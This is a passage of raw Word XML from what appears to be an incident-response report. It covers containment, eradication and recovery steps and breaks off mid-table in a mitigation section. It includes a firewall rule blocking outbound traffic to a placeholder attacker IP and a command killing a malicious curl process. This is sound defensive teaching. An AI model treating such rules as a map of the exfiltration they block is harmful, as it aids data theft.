          <w:p w:rsidR="000F0180" w:rsidP="000F0180" w:rsidRDefault="00102484" w14:paraId="31EC3A46" w14:textId="7DB2136E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>New-NetFirewallRule -DisplayName "Block Outbound to &lt;ATTACKER_IP&gt;" -Direction Outbound -RemoteAddress &lt;ATTACKER_IP&gt; -Action Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F0180" w:rsidTr="000F0180" w14:paraId="07B11595" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F0180" w:rsidP="000F0180" w:rsidRDefault="00D21B8D" w14:paraId="4817F5A1" w14:textId="596BC988">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>New-NetFirewallRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F0180" w:rsidP="000F0180" w:rsidRDefault="00832108" w14:paraId="5A36E9B8" w14:textId="3C745AA1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To create a new rule in Windows Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F0180" w:rsidTr="000F0180" w14:paraId="63ADF832" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F0180" w:rsidP="000F0180" w:rsidRDefault="00D21B8D" w14:paraId="2FF7516A" w14:textId="08F60D24">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-DisplayName "Block Outbound to &lt;ATTACKER_IP&gt;"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F0180" w:rsidP="000F0180" w:rsidRDefault="00832108" w14:paraId="3DFB1052" w14:textId="43BE9C4D">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The rule name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F0180" w:rsidTr="000F0180" w14:paraId="1D1CAE5A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F0180" w:rsidP="000F0180" w:rsidRDefault="00D21B8D" w14:paraId="51CAE21D" w14:textId="3F43F351">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-Direction Outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000F0180" w:rsidP="000F0180" w:rsidRDefault="00832108" w14:paraId="6F514DA5" w14:textId="794DB230">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The traffic direction is set to Outbound which means the traffic that is leaving the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21B8D" w:rsidTr="000F0180" w14:paraId="6366A745" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00102484" w:rsidR="00D21B8D" w:rsidP="000F0180" w:rsidRDefault="00D21B8D" w14:paraId="315CE710" w14:textId="448AA9CB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-RemoteAddress &lt;ATTACKER_IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D21B8D" w:rsidP="000F0180" w:rsidRDefault="00832108" w14:paraId="54192328" w14:textId="0078BB71">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The destination IP address to match</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A02F4C" w:rsidTr="000F0180" w14:paraId="63E746AA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A02F4C" w:rsidP="000F0180" w:rsidRDefault="00A02F4C" w14:paraId="3286B41D" w14:textId="3A8ECC63">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-Action Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A02F4C" w:rsidP="000F0180" w:rsidRDefault="00832108" w14:paraId="74B8782D" w14:textId="6AF69F01">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To block the connection if the IP matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AA46E5" w:rsidP="511508E8" w:rsidRDefault="511508E8" w14:paraId="6E37387F" w14:textId="0B4D9C3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>End the malicious task</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="511508E8" w:rsidP="511508E8" w:rsidRDefault="511508E8" w14:paraId="7DB1D538" w14:textId="6EE56E5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Use Task Manager to check if the curl task is still running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="511508E8" w:rsidP="511508E8" w:rsidRDefault="511508E8" w14:paraId="51B9AC49" w14:textId="65FA49A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The following command ends the curl task if it is still running</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4591"/>
        <w:gridCol w:w="4591"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA46E5" w:rsidTr="00732B3A" w14:paraId="4D517A95" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9182" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00AA46E5" w:rsidP="00AA46E5" w:rsidRDefault="00AA46E5" w14:paraId="6405CB34" w14:textId="7739405B">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>taskkill /IM curl.exe /F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA46E5" w:rsidTr="00AA46E5" w14:paraId="1E1A18D7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AA46E5" w:rsidP="00AA46E5" w:rsidRDefault="00AA46E5" w14:paraId="26614431" w14:textId="60B216E9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>taskkill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AA46E5" w:rsidP="00AA46E5" w:rsidRDefault="00832108" w14:paraId="7C81E423" w14:textId="6891DC2F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Windows command to terminate a running process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA46E5" w:rsidTr="00AA46E5" w14:paraId="66903BBB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AA46E5" w:rsidP="00AA46E5" w:rsidRDefault="00AA46E5" w14:paraId="4496865E" w14:textId="4722F58D">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/IM curl.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AA46E5" w:rsidP="00AA46E5" w:rsidRDefault="00832108" w14:paraId="5DAD9093" w14:textId="17298ED8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Specify the program to kill, curl.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA46E5" w:rsidTr="00AA46E5" w14:paraId="7EE6B9CE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AA46E5" w:rsidP="00AA46E5" w:rsidRDefault="00AA46E5" w14:paraId="17C91CA2" w14:textId="7DCED5A3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4591" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AA46E5" w:rsidP="00AA46E5" w:rsidRDefault="00832108" w14:paraId="195C243B" w14:textId="664162BD">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To force the process to stop immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="00AA46E5" w:rsidR="00AA46E5" w:rsidP="2BFA4357" w:rsidRDefault="00AA46E5" w14:paraId="685351DA" w14:textId="58234D24">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0044124E" w:rsidR="00AA46E5" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="5496950E" w14:textId="2F9606CD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eradication:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00194137" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="54391ED0" w14:textId="54A5A905">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Remove any malicious scripts, payloads or persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00046DFA" w:rsidR="00046DFA" w:rsidP="00E41785" w:rsidRDefault="00046DFA" w14:paraId="1E90DD40" w14:textId="29AC8DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Review accessed files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00046DFA" w:rsidR="00046DFA" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="1979FD58" w14:textId="16A50A27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Reset affected credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044124E" w:rsidP="2BFA4357" w:rsidRDefault="0044124E" w14:paraId="130086E2" w14:textId="4F51B617">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0044124E" w:rsidR="0044124E" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="50F14E23" w14:textId="6761765F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00046DFA" w:rsidR="00B8236E" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="625798F3" w14:textId="1EEE453B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Monitor outbound traffic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044124E" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="756CBF4F" w14:textId="2A03AE51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Reconnect to the network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00046DFA" w:rsidR="0044124E" w:rsidP="00E41785" w:rsidRDefault="2BFA4357" w14:paraId="2BAEF972" w14:textId="5DCBD8AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Conduct post-incident activity which is the next stage of the incident response lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="55938B2D" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="2BFA4357" w:rsidRDefault="2BFA4357" w14:paraId="184F2294" w14:textId="02FCE142">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896710" w:id="64"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Control/Mitigation </w:t>
      </w:r>
      <w:commentRangeStart w:id="65"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:commentRangeEnd w:id="65"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="65"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9182" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="2538"/>
        <w:gridCol w:w="2834"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C64DB" w:rsidTr="6BBFDBE2" w14:paraId="423627EC" w14:textId="7B02BA49">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00595EB4" w:rsidR="004C64DB" w:rsidP="00595EB4" w:rsidRDefault="004C64DB" w14:paraId="1149665C" w14:textId="64950821">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00595EB4" w:rsidR="004C64DB" w:rsidP="00595EB4" w:rsidRDefault="004C64DB" w14:paraId="47E89F5A" w14:textId="32085A6E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00595EB4" w:rsidR="004C64DB" w:rsidP="00595EB4" w:rsidRDefault="004C64DB" w14:paraId="73377F56" w14:textId="3BBE262C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2834" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="1E0EC8B7" w:rsidP="1E0EC8B7" w:rsidRDefault="530B04A8" w14:paraId="2D987100" w14:textId="6E72629D">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C64DB" w:rsidTr="6BBFDBE2" w14:paraId="5655EA35" w14:textId="0003D817">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="65116661" w:rsidRDefault="004C64DB" w14:paraId="32A6559D" w14:textId="4E23015B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Egress filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="006D13F1" w:rsidRDefault="006D13F1" w14:paraId="322F2973" w14:textId="78176C80">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Firewall or network rule to block outgoing traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2538" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004C64DB" w:rsidP="004C64DB" w:rsidRDefault="004C64DB" w14:paraId="78D29482" w14:textId="1229E3E1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              </w:rPr>
